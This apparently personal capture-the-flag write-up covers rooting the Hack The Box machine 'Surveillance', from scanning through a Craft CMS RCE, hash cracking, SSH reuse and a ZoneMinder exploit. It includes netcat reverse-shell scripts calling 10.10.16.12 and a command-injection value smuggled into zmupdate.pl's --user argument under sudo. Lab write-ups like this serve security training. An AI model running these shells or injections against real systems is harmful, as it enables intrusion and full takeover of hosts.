Surveillance

Surveillance

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA) |_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://surveillance.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
echo "10.129.230.42 surveillance.htb" >> /etc/hosts
 
 
notion image
notion image
it’s craft CMS4.4.14
 
start googling
Find a new RCE vulnerability corresponding to the CMS version
CVE-2023-41892
finally find a Poc here:
notion image
script /dev/null -c /bin/bash CTRL + Z stty raw -echo; fg Then press Enter twice, and then enter: export TERM=xterm
improve shell interaction
 
enumerate folders
www-data@surveillance:~/html/craft/storage/backups$ ls surveillance--2023-10-17-202801--v4.4.14.sql surveillance--2023-10-17-202801--v4.4.14.sql.zip 7-202801--v4.4.14.sql:~/html/craft/storage/backups$ file surveillance--2023-10-17 surveillance--2023-10-17-202801--v4.4.14.sql: ASCII text
 
noticed a .sql file, download
i found a users table by keywords search, then i trace back to the insert command in the .sql file, it turns out:
search for ‘INSERT INTO user ’ then i get
NSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46'); /*!40000 ALTER TABLE `users` ENABLE KEYS */; UNLOCK TABLES; commit;
39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec seems a hash
check the users name inside /etc/passwd file, i found a user named “matthew”
notion image
notion image
i got the credential by online cracking the hashes obtained from .sql file
To see if i can switch to user “matthew”
ssh matthew@surveillance.htb starcraft122490
notion image
successfully switched to matthew!
notion image
 
SUID and sudo -l
notion image
local ports, no password for mysql.
check version
matthew@surveillance:~$ cat /etc/os-release PRETTY_NAME="Ubuntu 22.04.3 LTS" NAME="Ubuntu" VERSION_ID="22.04" VERSION="22.04.3 LTS (Jammy Jellyfish)" VERSION_CODENAME=jammy ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=jammy
googling for this version PE exploit, because i remember this version is vulnerable.
CVE-2023-2640-CVE-2023-32629
g1viUpdated Aug 6, 2024
try this, but seems not work
notion image
try linpeas to enumerate
notion image
notion image
╔══════════╣ Analyzing Backup Manager Files (limit 70) -rw-r--r-- 1 root zoneminder 5265 Nov 18 2022 /usr/share/zoneminder/www/ajax/modals/storage.php -rw-r--r-- 1 root zoneminder 1249 Nov 18 2022 /usr/share/zoneminder/www/includes/actions/storage.php -rw-r--r-- 1 root zoneminder 3503 Oct 17 11:32 /usr/share/zoneminder/www/api/app/Config/database.php 'password' => ZM_DB_PASS, 'database' => ZM_DB_NAME, 'host' => 'localhost', 'password' => 'ZoneMinderPassword2023', 'database' => 'zm', $this->default['host'] = $array[0]; $this->default['host'] = ZM_DB_HOST; -rw-r--r-- 1 root zoneminder 11257 Nov 18 2022 /usr/share/zoneminder/www/includes/database.php
get a credential ZoneMinderPassword2023
To see what is zoneminder
notion image
it is a software for monitoring via closed-circuit
notion image
i searched deeply for the port of this software, it was set to 80 as default, but 80 is already occupied by the CMS application, thus 8080 is likely to be the port of zonemineder software.
lets set port forwarding
ssh -L 1234:localhost:8080 matthew@surveillance.htb starcraft122490
notion image
notion image
use
admin:ZoneMinderPassword2023 admin:admin
failed
cd /usr/share/zoneminder/www/api/app/Config; cat * | grep - version
notion image
The version is 1.36.32.1
google searching
notion image
notion image
git clone https://github.com/rvizx/CVE-2023-26035
notion image
exploit, get the shell
 
create a bind shell , pwn.sh
#!/bin/bash nc 10.10.16.12 8888 -e sh
sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/pwn.sh)' --pass=ZoneMinderPassword2023
it not works, change the pwn.sh by using busybox’s nc for bind shell connection
#!/bin/bash busybox nc 10.10.16.12 8888 -e sh
notion image
get the root!